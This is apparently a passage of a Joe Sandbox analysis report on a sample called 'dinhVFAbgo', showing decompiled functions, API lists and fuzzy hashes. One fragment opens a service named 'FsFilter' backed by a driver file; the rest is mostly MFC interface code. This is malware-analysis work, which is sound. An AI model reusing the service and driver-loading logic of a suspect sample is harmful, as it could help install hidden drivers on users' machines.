0x00ca8ff3
0x00ca8ff7
0x00ca8fd9
0x00ca8fd9
0x00ca8fdc
0x00ca8fde
0x00ca8feb
0x00ca8fed
0x00ca8fed
0x00ca8fb7
0x00ca8fbd
0x00ca8fc0
0x00ca8fc2
0x00ca8fc2
0x00000000
0x00ca8ff8
0x00ca8f94
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,00CA7DE6,?,?,?,?,000000FF), ref: 00CA8F87
CloseServiceHandle.ADVAPI32(00000000,?,?,?,000000FF), ref: 00CA8F94
OpenServiceA.ADVAPI32(00000000,FsFilter,000F01FF,C:\DownLoad-Helper\x64_FsFilter.dat,?,?,?,000000FF), ref: 00CA8FAA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,000000FF), ref: 00CA8FBD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,000000FF), ref: 00CA8FC0

Strings

C:\DownLoad-Helper\x64_FsFilter.dat, xrefs: 00CA8F9E
FsFilter, xrefs: 00CA8FA4

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Service$CloseHandle$Open$Manager
String ID: C:\DownLoad-Helper\x64_FsFilter.dat$FsFilter
API String ID: 1636202080-2958689618
Opcode ID: bfdffb58fc26f05c750a583f6fb2274d49614408449e5e769f1b7f6ce1e8db3f
Instruction ID: 6aad1d828b3d97b120d4156dcedb6108377171730f3dbbe746d229adb97e2a96
Opcode Fuzzy Hash: bfdffb58fc26f05c750a583f6fb2274d49614408449e5e769f1b7f6ce1e8db3f
Instruction Fuzzy Hash: A901F97265C32B6F43112FB25C4887F2D7DDB4ABE93010425F566F2140DE148D0995B4

Uniqueness

Uniqueness Score: -1.00%

Function 00CC6EBD Relevance: 22.7, APIs: 15, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CC6EBD(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				struct HDC__* _t85;
				struct HICON__* _t91;
				void* _t110;
				void* _t113;
				intOrPtr _t115;
				struct HBRUSH__* _t116;
				void* _t121;
				struct HICON__* _t125;
				intOrPtr _t129;
				intOrPtr _t130;
				struct HICON__* _t139;
				intOrPtr _t140;
				struct HICON__* _t143;
				struct HDC__* _t145;
				void* _t146;
				void* _t165;

				_t165 = __fp0;
				_t144 = __esi;
				_push(0x70);
				E00DDD55F(0xe092c6, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t146 - 0x24)) = __ecx;
				_t125 =  *(_t146 + 0x10);
				_t143 =  *(_t146 + 0x18);
				 *(_t146 - 0x2c) =  *(_t146 + 8);
				 *(_t146 - 0x30) = _t125;
				E00CC54AE(__ecx,  *((intOrPtr*)(_t146 + 0x14)));
				_t139 =  *(_t146 - 0x2c);
				if(_t139 == 0) {
					L31:
					return E00DDD50E(_t125, _t143, _t144);
				} else {
					_t129 =  *((intOrPtr*)(_t146 - 0x24));
					_t145 = 0;
					 *((intOrPtr*)(_t146 - 0x40)) = (0 | _t143 != 0x00000000) + 2;
					goto L2;
					L6:
					if( *((intOrPtr*)(_t146 + 0x14)) == 0) {
						__eflags = _t145;
						if(__eflags != 0) {
							_t15 = _t145 - 1; // -1
							asm("sbb eax, eax");
							_t85 = ( ~_t15 & 0x00000118) + 0x208;
							__eflags = _t85;
						} else {
							_t85 = 0xf0;
						}
					} else {
						if(_t145 != 0) {
							_t14 = _t145 - 1; // -1
							asm("sbb eax, eax");
							_t85 = ( ~_t14 & 0x00000118) + 0x550;
						} else {
							_t85 = 0x438;
						}
					}
					 *((intOrPtr*)(_t146 - 0x28)) = _t85 + _t129;
					if(_t125 != 0) {
						GetIconInfo(_t125, _t146 - 0x64);
						GetObjectA( *(_t146 - 0x54), 0x18, _t146 - 0x7c);
						_t130 =  *((intOrPtr*)(_t146 - 0x24));
						 *((intOrPtr*)(_t130 + 0xe0)) =  *((intOrPtr*)(_t146 - 0x78));
						 *((intOrPtr*)(_t130 + 0xe4)) =  *((intOrPtr*)(_t146 - 0x74));
						if(_t145 == 0) {
							E00CB9032(_t146 - 0x50);
							 *(_t146 - 4) =  *(_t146 - 4) & _t145;
							E00CB9B84(_t125, _t146 - 0x50, CreateCompatibleDC(_t145));
							_t110 = CopyImage( *(_t146 - 0x54), 0, 0, 0, 0x2000);
							 *(_t146 - 0x3c) = _t110;
							if(_t110 != 0) {
								 *(_t146 - 0x38) = SelectObject( *(_t146 - 0x4c), _t110);
								_t113 = E00CC19ED();
								 *(_t146 - 0x20) =  *(_t146 - 0x20) & _t145;
								 *(_t146 - 0x1c) =  *(_t146 - 0x1c) & _t145;
								 *(_t146 - 0x34) = _t113 + 0x98;
								_t115 =  *((intOrPtr*)(_t146 - 0x24));
								_t116 =  *(_t146 - 0x34);
								 *((intOrPtr*)(_t146 - 0x18)) =  *((intOrPtr*)(_t115 + 0xe0));
								 *((intOrPtr*)(_t146 - 0x14)) =  *((intOrPtr*)(_t115 + 0xe4));
								if(_t116 != 0) {
									_t116 =  *(_t116 + 4);
								}
								FillRect( *(_t146 - 0x4c), _t146 - 0x20, _t116);
								DrawIconEx( *(_t146 - 0x4c), 0, 0, _t125,  *( *((intOrPtr*)(_t146 - 0x24)) + 0xe0),  *( *((intOrPtr*)(_t146 - 0x24)) + 0xe4), 0, 0, 3);
								_t121 =  *(_t146 - 0x38);
								if(_t121 != 0) {
									SelectObject( *(_t146 - 0x4c), _t121);
								}
								DeleteObject( *(_t146 - 0x3c));
							}
							 *(_t146 - 4) =  *(_t146 - 4) | 0xffffffff;
							E00CB91A4(_t146 - 0x50);
						}
						DeleteObject( *(_t146 - 0x54));
						DeleteObject( *(_t146 - 0x58));
						_t160 =  *((intOrPtr*)(_t146 + 0x1c));
						_t140 =  *((intOrPtr*)(_t146 - 0x28));
						 *((intOrPtr*)(_t140 + 0x54)) =  *((intOrPtr*)(_t146 - 0x78));
						 *((intOrPtr*)(_t140 + 0x58)) =  *((intOrPtr*)(_t146 - 0x74));
						if( *((intOrPtr*)(_t146 + 0x1c)) == 0) {
							E00CC71EE( *((intOrPtr*)(_t146 - 0x28)),  *((intOrPtr*)(E00CC19ED() + 0x1c)));
							_t140 =  *((intOrPtr*)(_t146 - 0x28));
						}
						_push( *((intOrPtr*)(_t146 + 0x1c)));
						_push(_t125);
						E00CDA98F(_t125, _t140, _t140, _t143, _t145, _t160, _t165);
						_t129 =  *((intOrPtr*)(_t146 - 0x24));
						_t139 =  *(_t146 - 0x2c);
					}
					_t125 =  *(_t146 - 0x30);
					_t145 =  &(_t145->i);
					if(_t145 <  *((intOrPtr*)(_t146 - 0x40))) {
						L2:
						if(_t145 != 0) {
							__eflags = _t145 - 1;
							if(__eflags != 0) {
								_t125 = _t143;
							}
						} else {
							_t125 = _t139;
						}
						goto L6;
					} else {
						if( *((intOrPtr*)(_t146 + 0xc)) != 0) {
							DestroyIcon(_t139);
							_t91 = _t125;
							if(_t91 != 0) {
								DestroyIcon(_t91);
							}
							if(_t143 != 0) {
								DestroyIcon(_t143);
							}
						}
						goto L31;
					}
				}
			}

0x00cc6ebd
0x00cc6ebd
0x00cc6ebd
0x00cc6ec4
0x00cc6ecb
0x00cc6ed4
0x00cc6ed7
0x00cc6eda
0x00cc6edf
0x00cc6ee2
0x00cc6ee7
0x00cc6eec
0x00cc70e1
0x00cc70e6
0x00cc6ef2
0x00cc6ef2
0x00cc6eff
0x00cc6f01
0x00cc6f01
0x00cc6f13
0x00cc6f17
0x00cc6f37
0x00cc6f39
0x00cc6f42
0x00cc6f47
0x00cc6f4e
0x00cc6f4e
0x00cc6f3b
0x00cc6f3b
0x00cc6f3b
0x00cc6f19
0x00cc6f1b
0x00cc6f24
0x00cc6f29
0x00cc6f30
0x00cc6f1d
0x00cc6f1d
0x00cc6f1d
0x00cc6f1b
0x00cc6f55
0x00cc6f5a
0x00cc6f65
0x00cc6f74
0x00cc6f7a
0x00cc6f80
0x00cc6f89
0x00cc6f91
0x00cc6f9a
0x00cc6f9f
0x00cc6fad
0x00cc6fbf
0x00cc6fc5
0x00cc6fca
0x00cc6fda
0x00cc6fdd
0x00cc6fe2
0x00cc6fea
0x00cc6fed
0x00cc6ff0
0x00cc6fff
0x00cc7002
0x00cc7005
0x00cc700a
0x00cc700c
0x00cc700c
0x00cc7017
0x00cc7038
0x00cc703e
0x00cc7043
0x00cc7049
0x00cc7049
0x00cc7052
0x00cc7052
0x00cc7058
0x00cc705f
0x00cc705f
0x00cc7067
0x00cc7070
0x00cc7076
0x00cc707a
0x00cc7083
0x00cc7086
0x00cc7089
0x00cc7096
0x00cc709b
0x00cc709b
0x00cc709e
0x00cc70a3
0x00cc70a4
0x00cc70a9
0x00cc70ac
0x00cc70ac
0x00cc70af
0x00cc70b2
0x00cc70b6
0x00cc6f04
0x00cc6f06
0x00cc6f0c
0x00cc6f0f
0x00cc6f11
0x00cc6f11
0x00cc6f08
0x00cc6f08
0x00cc6f08
0x00000000
0x00cc70bc
0x00cc70c0
0x00cc70c3
0x00cc70c9
0x00cc70cd
0x00cc70d0
0x00cc70d0
0x00cc70d8
0x00cc70db
0x00cc70db
0x00cc70d8
0x00000000
0x00cc70c0
0x00cc70b6

APIs

__EH_prolog3_GS.LIBCMT ref: 00CC6EC4
GetIconInfo.USER32(?,?), ref: 00CC6F65
GetObjectA.GDI32(?,00000018,?), ref: 00CC6F74
CreateCompatibleDC.GDI32(00000000), ref: 00CC6FA3
CopyImage.USER32 ref: 00CC6FBF
SelectObject.GDI32(?,00000000), ref: 00CC6FD4
FillRect.USER32 ref: 00CC7017
DrawIconEx.USER32 ref: 00CC7038
SelectObject.GDI32(?,?), ref: 00CC7049
DeleteObject.GDI32(?), ref: 00CC7052
DeleteObject.GDI32(?), ref: 00CC7067
DeleteObject.GDI32(?), ref: 00CC7070
DestroyIcon.USER32(?,00000070,00CC6398,00000000,00000001,00000000,00000000,00000000,00000000,MFCButton_ImageID,?,00000000,MFCButton_ImageType,?,00000000,MFCButton_CursorType), ref: 00CC70C3
DestroyIcon.USER32(?), ref: 00CC70D0
DestroyIcon.USER32(?), ref: 00CC70DB

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$Icon$DeleteDestroy$Select$CompatibleCopyCreateDrawFillH_prolog3_ImageInfoRect
String ID:
API String ID: 2061919445-0
Opcode ID: 616006f2fc8c56b75f42c0b030433c6cf42a0710c5a1887c75bb4c8b8345b510
Instruction ID: 7321e741179b4fed475e9b3776a4def88cdb94f9afecc2069eea3bffc18de0e4
Opcode Fuzzy Hash: 616006f2fc8c56b75f42c0b030433c6cf42a0710c5a1887c75bb4c8b8345b510
Instruction Fuzzy Hash: BC6144B1A04209AFDB15DFA4DD89BEEBBB5FF08300F148129F851A6261DB359E44DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D04E94 Relevance: 21.3, APIs: 14, Instructions: 286
windowCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00D04E94(intOrPtr* __ecx, long __edx, int _a4, struct tagPOINT _a8, signed int _a12) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t91;
				void* _t94;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t100;
				int _t105;
				void* _t112;
				void* _t114;
				void* _t115;
				int _t119;
				int _t120;
				int _t125;
				int _t128;
				int _t141;
				intOrPtr _t149;
				int _t155;
				int _t156;
				int _t157;
				long _t162;
				long _t163;
				intOrPtr* _t166;
				intOrPtr _t182;
				int _t183;
				int _t184;
				long _t187;
				int _t199;
				long _t201;
				long* _t206;
				void* _t219;
				void* _t221;
				signed int _t222;

				_t202 = __edx;
				_t167 = __ecx;
				_t91 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t91 ^ _t222;
				_t166 = __ecx;
				_t205 = 0;
				if( *((intOrPtr*)(__ecx + 0x29c)) == 0) {
					__eflags =  *(__ecx + 0x26c);
					if( *(__ecx + 0x26c) == 0) {
						_t94 = E00CB277F(_t166, _t167, _t202, GetCapture());
						__eflags = _t94 - _t166;
						if(_t94 != _t166) {
							L28:
							__eflags =  *((intOrPtr*)(_t166 + 0x250)) - _t205;
							if(__eflags == 0) {
								_t97 = E00CC1A50(_t166, _t205, _t210, __eflags);
								_t205 = _t97;
								_t210 =  *((intOrPtr*)( *_t97 + 0x118));
								 *0xe17a64();
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x118))))();
								if(__eflags == 0) {
									__eflags =  *(_t166 + 0x254);
									if(__eflags != 0) {
										_t100 = E00CC1A50(_t166, _t205, _t210, __eflags);
										_t205 = _t100;
										_t210 =  *((intOrPtr*)( *_t100 + 0x114));
										 *0xe17a64();
										 *(_t166 + 0x88) =  *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x114))))();
									}
								} else {
									 *(_t166 + 0x88) = 1;
								}
							}
							_t95 = E00CFD2DB(_t166, _t202, __eflags, _a4, _a8.x, _a12);
							L34:
							return E00DDCBCE(_t95, _t166, _v8 ^ _t222, _t202, _t205, _t210);
						}
						_t210 =  *((intOrPtr*)( *_t166 + 0x2f0));
						 *0xe17a64();
						_t105 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2f0))))();
						__eflags = _t105;
						if(_t105 == 0) {
							goto L28;
						}
						__eflags =  *(_t166 + 0x158);
						if( *(_t166 + 0x158) == 0) {
							goto L28;
						}
						_v24.right.x = 0;
						_v24.bottom = 0;
						GetCursorPos( &(_v24.right));
						_t180 =  *((intOrPtr*)(_t166 + 0x15c)) - _v24.right.x;
						_v24.right.x =  *((intOrPtr*)(_t166 + 0x15c)) - _v24.right.x;
						_v24.bottom =  *((intOrPtr*)(_t166 + 0x160)) - _v24.bottom;
						_t210 = GetSystemMetrics(0x44);
						_t112 = E00CB277F(_t166,  *((intOrPtr*)(_t166 + 0x15c)) - _v24.right.x, _t202, GetCapture());
						__eflags = _t112 - _t166;
						if(_t112 != _t166) {
							L27:
							_t114 = E00CB277F(_t166, _t180, _t202, GetParent( *(_t166 + 0x20)));
							_t202 = (_a12 & 0x0000ffff) << 0x00000010 | _a8.x & 0x0000ffff;
							_t95 = SendMessageA( *(_t114 + 0x20),  *0xe87ef0, _a4, (_a12 & 0x0000ffff) << 0x00000010 | _a8.x & 0x0000ffff);
							__eflags = _t95;
							if(_t95 != 0) {
								goto L34;
							}
							goto L28;
						}
						__eflags =  *(_t166 + 0x158);
						if( *(_t166 + 0x158) == 0) {
							goto L27;
						}
						_t115 = E00DEC8A6(_t202, _v24.right.x);
						_pop(_t180);
						__eflags = _t115 - _t210;
						if(_t115 >= _t210) {
							goto L27;
						}
						_t95 = E00DEC8A6(_t202, _v24.bottom);
						_pop(_t180);
						__eflags = _t95 - _t210;
						if(_t95 < _t210) {
							goto L34;
						}
						goto L27;
					}
					_t182 =  *((intOrPtr*)(__ecx + 0x2a0));
					_t206 = __ecx + 0x2bc;
					_v24.bottom =  *_t206;
					_t183 = _t182 - _a8.x;
					_t119 = _t182 -  *((intOrPtr*)(__ecx + 0x2dc)) + 0xfffffffb;
					__eflags = _t119 - _t183;
					if(_t119 >= _t183) {
						_t119 = _t183;
					}
					 *(_t166 + 0x2b4) = _t119;
					_t120 = GetSystemMetrics(0x15);
					_t184 =  *(_t166 + 0x2b4);
					__eflags = _t120 + _t120 - _t184;
					if(_t120 + _t120 > _t184) {
						_t184 = GetSystemMetrics(0x15) + _t146;
						__eflags = _t184;
					}
					 *(_t166 + 0x2b4) = _t184;
					 *0xe17a64();
					 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2e4))))();
					_t187 =  *_t206;
					_t125 = _v24.bottom;
					__eflags = _t187 - _t125;
					if(_t187 > _t125) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v24.left = _t125 + 0xffffffec;
						_v24.right.x = _t187;
						 *0xe17a64();
						_t141 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x248))))() + 1;
						__eflags = _t141;
						InflateRect( &_v24, 0, _t141);
						InvalidateRect( *(_t166 + 0x20),  &_v24, 1);
						_t206 = _t166 + 0x2bc;
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *0xe17a64();
					_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x248))))();
					_t205 = 0;
					InflateRect( &_v40, 0, _t128);
					InvalidateRect( *(_t166 + 0x20),  &_v40, 1);
					UpdateWindow( *(_t166 + 0x20));
					_t210 =  *((intOrPtr*)( *_t166 + 0x2e0));
					 *0xe17a64();
					 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2e0))))();
					goto L28;
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				ClientToScreen( *(__ecx + 0x20),  &_a8);
				_t149 =  *((intOrPtr*)(_t166 + 0x29f8));
				if(_t149 != 1) {
					__eflags = _t149 - 2;
					if(_t149 == 2) {
						_t219 = _v24.bottom - _v24.top;
						asm("cdq");
						_t199 = _a12 - (_t219 - _t202 >> 1);
						_t155 =  *(_t166 + 0x320);
						_v24.top = _t199;
						_t202 = _t199 + _t219;
						_v24.bottom = _t202;
						__eflags = _t199 - _t155;
						if(_t199 >= _t155) {
							_t156 =  *((intOrPtr*)(_t166 + 0x328));
							__eflags = _t202 - _t156;
							if(_t202 > _t156) {
								_v24.bottom = _t156;
								_t157 = _t156 - _t219;
								__eflags = _t157;
								_v24.top = _t157;
							}
						} else {
							_v24.top = _t155;
							_v24.bottom = _t155 + _t219;
						}
					}
				} else {
					_t221 = _v24.right.x - _v24.left;
					asm("cdq");
					_t201 = _a8.x - (_t221 - _t202 >> 1);
					_t162 =  *(_t166 + 0x31c);
					_v24.left = _t201;
					_t202 = _t201 + _t221;
					_v24.right.x = _t202;
					if(_t201 >= _t162) {
						_t163 =  *(_t166 + 0x324);
						__eflags = _t202 - _t163;
						if(_t202 > _t163) {
							_v24.right.x = _t163;
							_v24.left = _t163 - _t221;
						}
					} else {
						_v24.left = _t162;
						_v24.right.x = _t162 + _t221;
					}
				}
				_t205 = _t166 + 0x30c;
				 *0xe17a64( &_v24, _t166 + 0x30c);
				_t95 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2fc))))();
				_t210 =  &_v24;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				goto L34;
			}

0x00d04e94
0x00d04e94
0x00d04e9a
0x00d04ea1
0x00d04ea6
0x00d04ea9
0x00d04eb1
0x00d04f90
0x00d04f96
0x00d050b6
0x00d050bb
0x00d050bd
0x00d05186
0x00d05186
0x00d0518c
0x00d0518e
0x00d05193
0x00d05197
0x00d0519f
0x00d051a9
0x00d051ab
0x00d051b9
0x00d051c0
0x00d051c2
0x00d051c7
0x00d051cb
0x00d051d3
0x00d051dd
0x00d051dd
0x00d051ad
0x00d051ad
0x00d051ad
0x00d051ab
0x00d051ee
0x00d051f3
0x00d05201
0x00d05201
0x00d050c5
0x00d050cd
0x00d050d5
0x00d050d7
0x00d050d9
0x00000000
0x00000000
0x00d050df
0x00d050e5
0x00000000
0x00000000
0x00d050ee
0x00d050f2
0x00d050f5
0x00d05107
0x00d0510f
0x00d05112
0x00d0511b
0x00d05124
0x00d05129
0x00d0512b
0x00d05153
0x00d0515d
0x00d0516d
0x00d0517c
0x00d05182
0x00d05184
0x00000000
0x00000000
0x00000000
0x00d05184
0x00d0512d
0x00d05133
0x00000000
0x00000000
0x00d05138
0x00d0513d
0x00d0513e
0x00d05140
0x00000000
0x00000000
0x00d05145
0x00d0514a
0x00d0514b
0x00d0514d
0x00000000
0x00000000
0x00000000
0x00d0514d
0x00d04f9c
0x00d04fa2
0x00d04faa
0x00d04fb5
0x00d04fb8
0x00d04fbb
0x00d04fbd
0x00d04fbf
0x00d04fbf
0x00d04fc3
0x00d04fc9
0x00d04fcf
0x00d04fd7
0x00d04fd9
0x00d04fe5
0x00d04fe5
0x00d04fe5
0x00d04fe9
0x00d04ff7
0x00d04fff
0x00d05001
0x00d05003
0x00d05006
0x00d05008
0x00d05012
0x00d05013
0x00d05014
0x00d05015
0x00d05016
0x00d0501b
0x00d05026
0x00d05030
0x00d05030
0x00d05038
0x00d05047
0x00d0504d
0x00d0504d
0x00d0505a
0x00d0505b
0x00d0505c
0x00d0505d
0x00d05066
0x00d0506e
0x00d05071
0x00d05078
0x00d05087
0x00d05090
0x00d05098
0x00d050a0
0x00d050a8
0x00000000
0x00d050a8
0x00d04ec0
0x00d04ec8
0x00d04ec9
0x00d04eca
0x00d04ecb
0x00d04ed1
0x00d04eda
0x00d04f1f
0x00d04f22
0x00d04f27
0x00d04f2f
0x00d04f34
0x00d04f36
0x00d04f3c
0x00d04f3f
0x00d04f42
0x00d04f45
0x00d04f47
0x00d04f53
0x00d04f59
0x00d04f5b
0x00d04f5d
0x00d04f60
0x00d04f60
0x00d04f62
0x00d04f62
0x00d04f49
0x00d04f49
0x00d04f4e
0x00d04f4e
0x00d04f47
0x00d04edc
0x00d04edf
0x00d04ee7
0x00d04eec
0x00d04eee
0x00d04ef4
0x00d04ef7
0x00d04efa
0x00d04eff
0x00d04f0b
0x00d04f11
0x00d04f13
0x00d04f15
0x00d04f1a
0x00d04f1a
0x00d04f01
0x00d04f01
0x00d04f06
0x00d04f06
0x00d04eff
0x00d04f67
0x00d04f7a
0x00d04f82
0x00d04f84
0x00d04f87
0x00d04f88
0x00d04f89
0x00d04f8a
0x00000000

APIs

ClientToScreen.USER32(?,?), ref: 00D04ECB
GetSystemMetrics.USER32 ref: 00D04FC9
GetSystemMetrics.USER32 ref: 00D04FDD
InflateRect.USER32(?,00000000,00000001), ref: 00D05038
InvalidateRect.USER32(?,?,00000001), ref: 00D05047
InflateRect.USER32(?,00000000,00000000), ref: 00D05078
InvalidateRect.USER32(?,?,00000001), ref: 00D05087
UpdateWindow.USER32(?), ref: 00D05090
GetCapture.USER32 ref: 00D050AF
GetCursorPos.USER32(?), ref: 00D050F5
GetSystemMetrics.USER32 ref: 00D05115
GetCapture.USER32 ref: 00D0511D
GetParent.USER32(?), ref: 00D05156
SendMessageA.USER32(?,?,?,00000000), ref: 00D0517C

Part of subcall function 00CC1A50: __EH_prolog3.LIBCMT ref: 00CC1A57

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$MetricsSystem$CaptureInflateInvalidate$ClientCursorH_prolog3MessageParentScreenSendUpdateWindow
String ID:
API String ID: 3442273144-0
Opcode ID: 0bbaf300d5495108a971dbafe16077bbb75e1b3c5198b48b921d1481ac88b6fd
Instruction ID: 4a4834dfc13d177747eb5096adfc780c7bcd346d3cb5db41b817120be871aadf
Opcode Fuzzy Hash: 0bbaf300d5495108a971dbafe16077bbb75e1b3c5198b48b921d1481ac88b6fd
Instruction Fuzzy Hash: 77B17A75A006169FCF00DF64D988AEE7BB6EF48700F1440A9ED1AEB295CB309A05CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00CC6118 Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 268
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CC6118(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, CHAR* __esi, void* __eflags, void* __fp0) {
				void* _t107;
				void* _t119;
				struct HINSTANCE__* _t147;
				struct HICON__* _t148;
				void* _t151;
				void* _t152;
				intOrPtr _t155;
				signed int _t159;
				void* _t167;
				void* _t168;
				void* _t169;
				void* _t201;
				void* _t203;
				void* _t209;
				void* _t222;
				intOrPtr* _t224;
				void* _t228;
				void* _t230;
				void* _t231;
				void* _t259;

				_t259 = __fp0;
				_t231 = __eflags;
				_t227 = __esi;
				_t222 = __edx;
				_push(0x34);
				E00DDD52C(0xe0929c, __ebx, __edi, __esi);
				_t224 = __ecx;
				E00CA67E1(_t230 - 0x2c);
				 *((intOrPtr*)(_t230 - 4)) = 0;
				E00CC1628( *((intOrPtr*)(_t230 + 0xc)), _t230 - 0x2c,  *((intOrPtr*)(_t230 + 8)));
				_push( *((intOrPtr*)(_t230 - 0x2c)));
				E00D0EB00(0, _t230 - 0x40, _t224, __esi, _t231);
				E00CA67E1(_t230 - 0x28);
				_push(0);
				 *((char*)(_t230 - 4)) = 2;
				_push(_t230 - 0x28);
				_push("MFCButton_Style");
				_t177 = _t230 - 0x40;
				if(E00D0EB78(0, _t230 - 0x40, _t224, __esi, _t231) != 0) {
					_t165 =  *((intOrPtr*)(_t230 - 0x28));
					if( *((intOrPtr*)( *((intOrPtr*)(_t230 - 0x28)) - 0xc)) != 0) {
						_t167 = E00DE7BE1(_t177, _t165) - 4;
						if(_t167 == 0) {
							 *(_t224 + 0x80) = 0;
						} else {
							_t168 = _t167 - 1;
							if(_t168 == 0) {
								 *(_t224 + 0x80) = 1;
							} else {
								_t169 = _t168 - 1;
								if(_t169 == 0) {
									 *(_t224 + 0x80) = 3;
								} else {
									_t237 = _t169 == 1;
									if(_t169 == 1) {
										 *(_t224 + 0x80) = 2;
									}
								}
							}
						}
					}
				}
				 *((intOrPtr*)(_t230 - 0x30)) = 0;
				_push(_t230 - 0x30);
				_push("MFCButton_Autosize");
				_push(_t230 - 0x40);
				if(E00D1034D(0, _t224, _t227, _t237) != 0) {
					_t239 =  *((intOrPtr*)(_t230 - 0x30));
					if( *((intOrPtr*)(_t230 - 0x30)) != 0) {
						_t227 =  *( *_t224 + 0x170);
						 *0xe17a64(_t230 - 0x18, 0);
						 *( *( *_t224 + 0x170))();
					}
				}
				E00CA67E1(_t230 - 0x24);
				_push(0);
				 *((char*)(_t230 - 4)) = 3;
				_push(_t230 - 0x24);
				_push("MFCButton_Tooltip");
				_t107 = E00D0EB78(0, _t230 - 0x40, _t224, _t227, _t239);
				_t240 = _t107;
				if(_t107 != 0) {
					E00CC7158(0, _t224, _t222,  *((intOrPtr*)(_t230 - 0x24)));
				}
				E00CA67E1(_t230 - 0x10);
				_push(0);
				 *((char*)(_t230 - 4)) = 4;
				_push(_t230 - 0x10);
				_push("MFCButton_FullTextTool");
				if(E00D0EB78(0, _t230 - 0x40, _t224, _t227, _t240) != 0) {
					_t155 =  *((intOrPtr*)(_t230 - 0x10));
					_t242 =  *((intOrPtr*)(_t155 - 0xc));
					if( *((intOrPtr*)(_t155 - 0xc)) != 0) {
						E00CC58DD(_t230 - 0x10, _t242);
						_push("TRUE");
						_t159 = E00CBFB65(0, _t224, _t227, _t230 - 0x10) & 0x000000ff;
						 *(_t224 + 0xd4) = _t159;
						 *(_t224 + 0xd8) = _t159;
					}
				}
				E00CA67E1(_t230 - 0x20);
				_push(0);
				 *((char*)(_t230 - 4)) = 5;
				_push(_t230 - 0x20);
				_push("MFCButton_CursorType");
				_t183 = _t230 - 0x40;
				if(E00D0EB78(0, _t230 - 0x40, _t224, _t227, _t242) != 0) {
					_t149 =  *((intOrPtr*)(_t230 - 0x20));
					if( *((intOrPtr*)( *((intOrPtr*)(_t230 - 0x20)) - 0xc)) != 0) {
						_t151 = E00DE7BE1(_t183, _t149) - 0xb;
						if(_t151 == 0) {
							L23:
							 *((intOrPtr*)(_t224 + 0x794)) = 0;
						} else {
							_t152 = _t151 - 1;
							if(_t152 == 0) {
								E00CC70E9(_t224);
							} else {
								_t247 = _t152 == 1;
								if(_t152 == 1) {
									goto L23;
								}
							}
						}
					}
